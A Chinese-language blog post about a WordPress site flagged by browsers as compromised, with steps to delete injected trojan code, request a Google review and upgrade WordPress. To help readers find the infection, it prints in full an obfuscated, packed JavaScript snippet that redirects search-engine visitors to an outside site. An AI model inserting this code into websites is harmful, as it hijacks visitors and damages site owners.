木马来了，怎么防？

一直在研究wordpress程序，但是前几天遇到一个纠结的问题，小川SEO博客在火狐和谷歌浏览器下提示网站被攻击：

咨询空间商说是因为程序有漏洞被恶意扫描导致，我惊出一身汗，wordpress不是被称为最安全的博客程序吗？怎么会有漏洞呢？又怎么会被挂马呢？
网上搜了一些信息，原来每一套程序都不是完美的，都会有或多或少的程序漏洞，这也是很多建站程序频繁升级的原因，所以建站程序一定要保持最新，有升级尽量升级程序。
带着问题打开wordpress中文官方网站，发现wordpress最新版本在4月21日已经升级到WordPress 3.3.2了，而我的还是wordpress3.3版本的呢，经过多方搜集，最终解决了这个小问题，这里也分享下解决方法：
1、找到并删除木马程序；
这个是必须的，先把闯入家门的强盗赶出去，才可以最一步防护，打开你的网站源文件看看有没有以下形式的代码：

<script language=\”JavaScript\”>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\\b’+e(c)+’\\\b’,’g’),k[c]);return p}(‘e r=x.9,t=\”\”,q;4(r.3(\”m.\”)!=-1)t=\”q\”;4(r.3(\”7.\”)!=-1)t=\”q\”;4(r.3(\”8.\”)!=-1)t=\”p\”;4(r.3(\”a.\”)!=-1)t=\”q\”;4(r.3(\”f.\”)!=-1)t=\”g\”;4(r.3(\”j.\”)!=-1)t=\”q\”;4(t.6&&((q=r.3(\”?\”+t+\”=\”))!=-1||(q=r.3(\”&\”+t+\”=\”))!=-1))B.C=\”v\”+\”w\”+\”:/\”+\”/A\”+\”b\”+\”k\”+\”5\”+\”h.\”+\”c\”+\”z/s\”+\”u\”+\”5\”+\”h.p\”+\”d?\”+\”t\”+\”y=1&t\”+\”i\”+\”l=\”+r.n(q+2+t.6).o(\”&\”)[0];’,39,39,’|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location’.split(‘|’),0,{}))</script>

代码隐藏的很严密，检查各个文件，比如functions.php文件，找到后删除然后上传覆盖；
2、提交谷歌网站管理员工具审查网站；
http://goo.gl/NNI33
没有账号就注册一个，然后按照提示一步步的把网站提交并提交审核，但是审核可能需要1~2个工作日；
3、升级网站程序；
外敌肃清了，还需要加强下网站防御，升级网站程序，提高安全。如果升级程序，请参照文章《wordpress怎么安全升级？》